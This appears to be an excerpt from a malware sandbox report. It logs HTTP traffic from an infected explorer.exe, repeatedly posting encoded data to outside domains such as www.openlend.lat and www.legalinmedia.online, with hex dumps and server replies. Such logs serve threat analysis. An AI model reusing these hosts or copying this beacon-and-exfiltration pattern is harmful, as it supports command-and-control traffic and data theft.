44 39 51 65 68 50 50 54 56 74 55 48 2b 4f 32 71 74 46 59 70 56 7a 44 75 45 4c 6c 4a 54 54 6a 51 34 4f 4e 4a 33 44 53 54 69 73 63 35 59 49 78 55 72 71 6c 58
                                                                                                                                                                                          Data Ascii: 1NM6e=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
                                                                                                                                                                                          Aug 10, 2023 10:19:56.964298010 CEST639OUTData Raw: 47 6e 63 76 71 32 65 4a 46 59 69 6c 57 68 36 43 6e 79 4d 5a 36 2f 30 58 68 33 48 7a 51 33 4e 79 65 47 55 63 34 63 31 44 4b 64 31 6b 43 63 31 7a 65 5a 4c 59 76 37 71 67 58 63 57 77 47 61 61 50 77 5a 68 6b 73 6f 45 55 39 56 5a 4e 53 75 49 54 51 76
                                                                                                                                                                                          Data Ascii: Gncvq2eJFYilWh6CnyMZ6/0Xh3HzQ3NyeGUc4c1DKd1kCc1zeZLYv7qgXcWwGaaPwZhksoEU9VZNSuITQvg9qmhSpgAy/M1lwE2hwCdU7o2RShstrFvF5A5pHVZdfKRoNVfSQyKSnGabR+5GByqoK8SIS6EjGxURGgFB7WL/KXQ+BrtpanrDAdkmv5U+R3tqXeJECUo4z2ItW26R6Z9INJ04cpaYZLuMRcMblP4cvpRQB07ierW
                                                                                                                                                                                          Aug 10, 2023 10:19:56.974169016 CEST642OUTData Raw: 31 4d 45 62 50 48 5a 48 55 69 69 51 6a 55 75 68 62 44 30 58 6d 46 6a 52 44 65 56 6a 4f 37 72 37 63 39 36 54 47 79 42 6a 61 6c 4e 4a 63 31 4a 41 31 45 49 38 76 4b 33 44 2b 59 59 68 6f 54 35 56 38 46 78 56 44 43 42 31 57 6f 7a 55 6a 73 74 49 36 36
                                                                                                                                                                                          Data Ascii: 1MEbPHZHUiiQjUuhbD0XmFjRDeVjO7r7c96TGyBjalNJc1JA1EI8vK3D+YYhoT5V8FxVDCB1WozUjstI66kz4ypeYZtgSSmyLjnzToUAmPNVTsuxgd6uAtBe9AXdCuuHLJbKeWN6rrtiY6w4P2P9lDL9pgCph0D036SJWpaP2VE7g+V0C6cnn795iLuvlMfiFO3IJSnX4EJTTyYrzrvTmWJzE1LGC1DOfpt/YlC86vD/fjxqpC+
                                                                                                                                                                                          Aug 10, 2023 10:19:56.974329948 CEST643OUTData Raw: 48 33 76 5a 61 31 32 6b 4a 30 7a 33 37 7a 39 4a 79 4f 6c 6b 77 74 76 36 42 74 53 75 6a 61 52 31 64 55 65 69 5a 70 4a 4d 6b 38 74 77 78 36 44 6d 49 74 53 65 67 52 42 2f 2b 48 6e 55 4f 7a 6a 2f 77 6a 65 59 53 52 58 33 68 66 51 7a 41 72 7a 33 5a 41
                                                                                                                                                                                          Data Ascii: H3vZa12kJ0z37z9JyOlkwtv6BtSujaR1dUeiZpJMk8twx6DmItSegRB/+HnUOzj/wjeYSRX3hfQzArz3ZAuFhEOOp4B3RUdQBp7s8Pphx+L2taFbOz+cYuszWy+emnZ8LMdOQ1Fp+NBbOMRX2gLOtBwzpxnnPcG7PoX8oRdZKMvAVjxgIQk2pGZbodKYcR3JMOlyYQuDlx+HtOEJLNzgyJRQdVvPdT9W1hfP3ozdoaLNjXJ+XMU
                                                                                                                                                                                          Aug 10, 2023 10:19:56.974518061 CEST652OUTData Raw: 78 37 69 55 32 43 68 62 72 58 68 46 35 73 44 30 4b 41 30 53 66 57 36 66 42 2b 68 2b 31 5a 38 56 37 63 4d 41 6a 63 56 4b 47 41 41 33 34 4e 69 50 70 59 2b 61 6e 44 62 36 77 38 37 37 4a 4e 33 79 67 37 52 30 61 58 49 49 46 4a 53 67 76 33 6f 63 64 65
                                                                                                                                                                                          Data Ascii: x7iU2ChbrXhF5sD0KA0SfW6fB+h+1Z8V7cMAjcVKGAA34NiPpY+anDb6w877JN3yg7R0aXIIFJSgv3ocdeOh5z9jeMSSKSmUw8wq6x7vex64jDnDsDNF85OlfmoR7+y7yOvt8oQfZg6Wv2F82/pUxrnBdXRRvWc1V8l9+spccofqmK3PwexcJDT3lvIXMQOYYXkOEnWOBzbX0ml5sBmcoq8aK3pxdsB7Nw1QsdCjOLvBinXiUJw
                                                                                                                                                                                          Aug 10, 2023 10:19:56.974668980 CEST654OUTData Raw: 62 50 75 50 75 56 33 2f 63 5a 52 7a 46 63 6e 5a 79 55 51 4c 39 74 79 67 4e 59 6a 36 66 75 55 69 50 61 48 37 4c 49 45 2f 57 79 64 34 6c 2f 54 50 61 43 6b 33 55 78 61 61 58 78 73 42 76 65 4e 6f 6f 4e 2f 75 6d 77 66 4d 53 5a 74 53 58 6f 48 63 65 50
                                                                                                                                                                                          Data Ascii: bPuPuV3/cZRzFcnZyUQL9tygNYj6fuUiPaH7LIE/Wyd4l/TPaCk3UxaaXxsBveNooN/umwfMSZtSXoHcePEhFYn11J07rkCVIFgOQ4nFRDQJjdx3h6rYbPq/3hOO2a6Nb7qsrT5eXtmqAcNuaV68vZnRie/jyaAdcaTJ/A81oW1FW2qB4sv4jCOENS07bV9TEiw5x4DhLIFwRDWhHbK4/428uiszwarEGlOBtqRMN6Dei+swe78
                                                                                                                                                                                          Aug 10, 2023 10:19:56.974841118 CEST655OUTData Raw: 76 2b 51 36 65 62 2f 4f 62 33 4b 68 6d 4a 64 33 73 4b 6a 71 34 31 69 4f 33 6d 30 53 51 4c 6d 72 6f 6e 65 49 66 4a 75 69 77 69 76 56 79 7a 57 77 6a 36 49 51 59 41 67 69 70 59 71 45 45 48 62 55 61 4f 35 50 6c 38 35 51 6e 37 66 42 38 71 6a 59 38 30
                                                                                                                                                                                          Data Ascii: v+Q6eb/Ob3KhmJd3sKjq41iO3m0SQLmroneIfJuiwivVyzWwj6IQYAgipYqEEHbUaO5Pl85Qn7fB8qjY803EwmooB/98vPQzzYDPM/QdN70zfrUr6y7FhZ8+/W83bIvwClBeDc3VfK3jJKJx9DVYQBJb023jRXIHVvPdbRELfxpgnRXDX6zI0oi4o/gAqZKhZx7n4hrnSWnf0Np8Mzh0mMYfEAopZZjvcWxxrUMNcuuz3+Z3eI8
                                                                                                                                                                                          Aug 10, 2023 10:19:56.975020885 CEST665OUTData Raw: 7a 48 51 30 57 31 4e 42 68 32 59 50 53 63 6b 76 41 71 45 64 6a 56 31 69 6f 32 6a 71 35 45 49 37 39 2b 51 33 62 57 64 72 6b 34 37 4f 6f 6a 7a 32 6b 68 6e 31 42 46 65 79 78 2b 50 65 57 45 50 51 67 4e 4f 65 6b 57 2f 41 64 31 48 43 5a 2f 45 37 73 75
                                                                                                                                                                                          Data Ascii: zHQ0W1NBh2YPSckvAqEdjV1io2jq5EI79+Q3bWdrk47Oojz2khn1BFeyx+PeWEPQgNOekW/Ad1HCZ/E7suEUZa1K0kdGwDh+r2Ds26HBpnNPQAFEI25O0ZKb7dErFB1XDaELx4IYpFf/HfnGqWPvswX6x8Rlb/ll8+y3ZPs8Ur5MeBr2bb8GB+eFm3g3F/uVdgZCv2/JmpsPOVAi19slOHcY555+hPFptOD01UnJ+avz3ijSGhH
                                                                                                                                                                                          Aug 10, 2023 10:19:56.984270096 CEST668OUTData Raw: 6c 51 46 6c 31 5a 32 6d 5a 63 2b 64 59 68 6f 6b 4e 61 71 54 55 42 71 2b 48 58 43 7a 52 4f 30 2f 46 52 6e 4f 43 67 48 73 44 2f 38 63 42 45 79 77 77 74 71 58 69 74 73 47 51 61 61 77 62 5a 69 50 68 72 50 76 7a 73 4e 34 73 49 38 75 76 48 6c 31 78 74
                                                                                                                                                                                          Data Ascii: lQFl1Z2mZc+dYhokNaqTUBq+HXCzRO0/FRnOCgHsD/8cBEywwtqXitsGQaawbZiPhrPvzsN4sI8uvHl1xtJvVE9J0IfHxskRyv9e0WuWYNseXZ+CGQlq/WDIal7rL/lJD1r3zNEbcDEwbF0CRjFXy1FKbtpSFqzE4iBg3dSKFAZosGs/wYSVq+gI8dPmHZTM1t1XbyaMD0o3DnsnM5KkzLYsQBPT9M0Ewvb8fR1nC3LVHfAlH6k
                                                                                                                                                                                          Aug 10, 2023 10:19:56.984433889 CEST669OUTData Raw: 55 51 78 58 42 4c 50 6f 4a 6f 78 47 37 37 35 77 63 61 4d 69 6b 4e 4f 49 67 6d 47 57 68 38 65 79 6c 5a 69 45 79 42 79 46 70 37 32 4a 4a 6b 47 65 55 37 43 68 72 59 6b 6b 50 2f 64 49 63 4e 75 4e 66 37 50 6e 65 66 31 6b 32 69 5a 41 56 65 44 65 6c 79
                                                                                                                                                                                          Data Ascii: UQxXBLPoJoxG775wcaMikNOIgmGWh8eylZiEyByFp72JJkGeU7ChrYkkP/dIcNuNf7Pnef1k2iZAVeDely1iwYJqTgiSOWTrDbYDQ8zpCNo2YeKFpfaFBEx3xu5HRrUEh0foQKrO+36PrQwukTaDCcYzczEa5govvIfA+JyLfGLSrrt60YDhojnlyOWmExA02YH5de7eYfxYfqsUl3W/WbTYGOrujC9NOyH1Ls71GIRuWL4tEUu
                                                                                                                                                                                          Aug 10, 2023 10:19:56.984607935 CEST670OUTData Raw: 6d 75 6f 56 4d 4b 47 44 76 32 35 61 50 57 55 34 71 7a 59 46 46 65 39 4a 63 44 73 37 76 45 70 7a 4e 37 62 79 31 70 67 2b 55 56 31 4a 49 61 4e 70 4b 68 33 4d 6f 7a 7a 5a 68 35 69 48 4c 61 48 32 32 38 65 52 49 34 6c 44 79 2f 4b 48 2f 69 61 2f 55 4a
                                                                                                                                                                                          Data Ascii: muoVMKGDv25aPWU4qzYFFe9JcDs7vEpzN7by1pg+UV1JIaNpKh3MozzZh5iHLaH228eRI4lDy/KH/ia/UJ1f17oClMqQ98h1q6wNiEwsKgbl7wzT9cIdm+Rqkst6BQsmW/WLiIhuGKrUiYwJsHtvBMbOkMewaVjUvwzeugJ07tzILB0b3zvCYWxXZSx275yjhU2exjA1t6hntYa4C5pAUi+sAw1BvSNPHTOFuK92Hg3LVXH2KnZ
                                                                                                                                                                                          Aug 10, 2023 10:19:57.068166971 CEST682INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                          Date: Thu, 10 Aug 2023 08:19:57 GMT
                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                          Content-Length: 162
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Server: BunnyCDN-DE1-1082
                                                                                                                                                                                          CDN-PullZone: 1536508
                                                                                                                                                                                          CDN-Uid: 604b1f1d-7233-45b4-b382-b287d2fc47e3
                                                                                                                                                                                          CDN-RequestCountryCode: CH
                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                          Location: https://www.openlend.lat/aw8o/
                                                                                                                                                                                          CDN-ProxyVer: 1.04
                                                                                                                                                                                          CDN-RequestPullSuccess: True
                                                                                                                                                                                          CDN-RequestPullCode: 301
                                                                                                                                                                                          CDN-CachedAt: 08/10/2023 08:19:57
                                                                                                                                                                                          CDN-EdgeStorageId: 1082
                                                                                                                                                                                          CDN-RequestId: 4a704c44d6d565ea980afd12e736448c
                                                                                                                                                                                          Aug 10, 2023 10:19:57.068238974 CEST682INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31
                                                                                                                                                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                          22192.168.11.2049737169.150.247.3980C:\Windows\explorer.exe
                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                          Aug 10, 2023 10:19:59.494374990 CEST683OUTGET /aw8o/?1NM6e=JwP18BaQn2gAMbwzAk/tzHq1rHqPkgowxzXz/N2AVg5llpqPoDBUT4Fbw9qJesVKC8w5QoNuWE8SYi183Rf2cdVRH8sDFcjA1Q==&P4=_n5TPHiTKZj HTTP/1.1
                                                                                                                                                                                          Host: www.openlend.lat
                                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                                                                                                                                          Aug 10, 2023 10:19:59.680810928 CEST684INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                          Date: Thu, 10 Aug 2023 08:19:59 GMT
                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                          Content-Length: 162
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Server: BunnyCDN-DE1-1082
                                                                                                                                                                                          CDN-PullZone: 1536508
                                                                                                                                                                                          CDN-Uid: 604b1f1d-7233-45b4-b382-b287d2fc47e3
                                                                                                                                                                                          CDN-RequestCountryCode: CH
                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                          Location: https://www.openlend.lat/aw8o/?1NM6e=JwP18BaQn2gAMbwzAk/tzHq1rHqPkgowxzXz/N2AVg5llpqPoDBUT4Fbw9qJesVKC8w5QoNuWE8SYi183Rf2cdVRH8sDFcjA1Q==&P4=_n5TPHiTKZj
                                                                                                                                                                                          CDN-ProxyVer: 1.04
                                                                                                                                                                                          CDN-RequestPullSuccess: True
                                                                                                                                                                                          CDN-RequestPullCode: 301
                                                                                                                                                                                          CDN-CachedAt: 08/10/2023 08:19:59
                                                                                                                                                                                          CDN-EdgeStorageId: 1080
                                                                                                                                                                                          CDN-Status: 301
                                                                                                                                                                                          CDN-RequestId: 6fe74e577446973cf2dc32f62cbc18c7
                                                                                                                                                                                          CDN-Cache: MISS
                                                                                                                                                                                          Aug 10, 2023 10:19:59.680876970 CEST684INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31
                                                                                                                                                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                          23192.168.11.204973891.189.114.2780C:\Windows\explorer.exe
                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                          Aug 10, 2023 10:20:04.859543085 CEST685OUTPOST /aw8o/ HTTP/1.1
                                                                                                                                                                                          Host: www.legalinmedia.online
                                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Origin: http://www.legalinmedia.online
                                                                                                                                                                                          Referer: http://www.legalinmedia.online/aw8o/
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Content-Length: 186
                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                                                                                                                                          Data Raw: 31 4e 4d 36 65 3d 52 75 34 6f 4a 47 4c 59 53 6f 51 31 6f 63 65 54 73 42 33 44 6c 69 77 43 59 58 6f 58 55 2b 4e 49 52 45 57 64 66 7a 56 34 2b 57 47 76 4a 48 31 46 68 59 63 6d 32 44 79 38 6a 4b 69 50 49 34 68 59 32 33 46 33 41 36 68 6b 2b 6b 78 67 6d 4a 31 6f 6b 42 79 2b 73 64 76 54 50 30 75 31 4b 6b 66 52 4a 71 51 2b 52 2b 65 76 55 73 79 4b 53 55 58 49 78 4f 41 4d 42 68 6e 48 4e 53 57 65 2b 54 6d 4f 76 79 72 52 2b 58 39 32 38 37 77 41 52 35 56 33 57 47 61 4f 55 58 30 6a 63 4e 34 7a 6e 74 62 6d 48 53 54 76 2f 51 4f 37 4e 49 33 69 56 6c 4b 43 5a 67 3d 3d
                                                                                                                                                                                          Data Ascii: 1NM6e=Ru4oJGLYSoQ1oceTsB3DliwCYXoXU+NIREWdfzV4+WGvJH1FhYcm2Dy8jKiPI4hY23F3A6hk+kxgmJ1okBy+sdvTP0u1KkfRJqQ+R+evUsyKSUXIxOAMBhnHNSWe+TmOvyrR+X9287wAR5V3WGaOUX0jcN4zntbmHSTv/QO7NI3iVlKCZg==
                                                                                                                                                                                          Aug 10, 2023 10:20:04.906179905 CEST687INHTTP/1.1 200 OK
                                                                                                                                                                                          Server: openresty
                                                                                                                                                                                          Date: Thu, 10 Aug 2023 08:20:04 GMT
                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Data Raw: 31 30 61 38 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 74 69 74 6c 65 3e d0 9d d0 b5 20 d0 be d0 bf d1 83 d0 b1 d0 bb d0 b8 d0 ba d0 be d0 b2 d0 b0 d0 bd 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 32 3f 66 61 6d 69 6c 79 3d 4e 6f 74 6f 2b 53 61 6e 73 3a 77 67 68 74 40 34 30 30 3b 37 30 30 26 64 69 73 70 6c 61 79 3d 73 77 61 70 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 79 61 73 74 61 74 69 63 2e 6e 65 74 2f 70 63 6f 64 65 2f 61 64 66 6f 78 2f 6c 6f 61 64 65 72 2e 6a 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 3e 0a 76 61 72 20 70 75 6e 79 63 6f 64 65 20 3d 20 6e 65 77 20 66 75 6e 63 74 69 6f 6e 20 50 75 6e 79 63 6f 64 65 28 29 20 7b 0a 20 20 20 20 74 68 69 73 2e 75 74 66 31 36 20 3d 20 7b 0a 20 20 20 20 20 20 20 20 64 65 63 6f 64 65 3a 66 75 6e 63 74 69 6f 6e 28 69 6e 70 75 74 29 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6f 75 74 70 75 74 20 3d 20 5b 5d 2c 20 69 3d 30 2c 20 6c 65 6e 3d 69 6e 70 75 74 2e 6c 65 6e 67 74 68 2c 76 61 6c 75 65 2c 65 78 74 72 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 68 69 6c 65 20 28 69 20 3c 20 6c 65 6e 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 6c 75 65 20 3d 20 69 6e 70 75 74 2e 63 68 61 72 43 6f 64 65 41 74 28 69 2b 2b 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 28 76 61 6c 75 65 20 26 20 30 78 46 38 30 30 29 20 3d 3d 3d 20 30 78 44 38 30 30 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 65 78 74 72 61 20 3d 20 69 6e 70 75 74 2e 63 68 61 72 43 6f 64 65 41 74 28 69 2b 2b 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 20 28 28 76 61 6c 75 65 20 26 20 30 78 46 43 30 30 29 20 21 3d 3d 20 30 78 44 38 30 30 29 20 7c 7c 20 28 28 65 78 74 72 61 20 26 20 30 78 46 43 30 30 29 20 21 3d 3d 20 30 78 44 43 30 30 29 20 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 68 72 6f 77 20 6e 65 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 55 54 46 2d 31 36 28 64 65 63 6f 64 65 29 3a 20 49 6c 6c 65 67 61 6c 20 55 54 46 2d 31 36 20 73 65 71 75 65 6e 63 65 22 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 6c 75 65 20 3d 20 28 28 76 61 6c 75 65 20 26 20 30 78 33 46 46 29 20 3c 3c 20 31 30 29 20 2b 20 28 65 78 74 72 61 20 26 20 30 78 33 46 46 29 20 2b 20 30 78 31 30 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 